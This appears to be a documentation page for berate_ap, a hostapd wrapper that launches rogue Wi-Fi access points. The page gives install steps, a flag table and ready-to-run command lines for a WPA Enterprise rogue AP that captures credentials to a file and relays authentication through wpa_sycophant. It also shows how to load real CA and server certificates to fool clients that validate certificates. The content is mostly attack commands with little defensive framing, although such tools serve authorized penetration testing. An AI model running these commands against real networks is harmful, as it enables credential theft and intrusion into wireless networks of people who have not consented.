Documentation Index
Fetch the complete documentation index at: https://docs.bytejmp.com/llms.txt
Use this file to discover all available pages before exploring further.
Overview
berate_ap is a wrapper around hostapd that simplifies launching rogue access points. It integrates natively with wpa_sycophant for relay attacks and supports loading custom TLS certificates for attacks against certificate-validating clients.
Install
git clone https://github.com/sensepost/berate_ap.git
cd berate_ap
Usage
./berate_ap [options] <interface> <bridge_iface> <ssid>
Common Flags
| Flag | Description |
|---|
--eap | Enable WPA Enterprise (EAP) mode |
--mana-wpe | Enable credential capture (WPE) |
--wpa-sycophant | Enable wpa_sycophant relay integration |
--mana-credout <file> | Write captured credentials to file |
--eap-cert-path <dir> | Load custom TLS certificates from directory |
WPA Enterprise Relay (with wpa_sycophant)
cd ~/tools/berate_ap/
./berate_ap --eap --mana-wpe --wpa-sycophant \
--mana-credout output.log \
wlan1 lo <TARGET-SSID>
Rogue AP with Custom Certificate
Used when the target client validates the server certificate. Requires the real CA and server certificate files converted to PEM.
openssl x509 -in ca.crt -out hostapd.ca.pem -outform PEM
openssl x509 -in server.crt -out hostapd.cert.pem -outform PEM
openssl rsa -in server.key -out hostapd.key.pem
openssl dhparam -out hostapd.dh.pem 2048
./berate_ap --eap --mana-wpe --wpa-sycophant \
--mana-credout output.log \
--eap-cert-path /path/to/certs/ \
wlan1 lo <TARGET-SSID>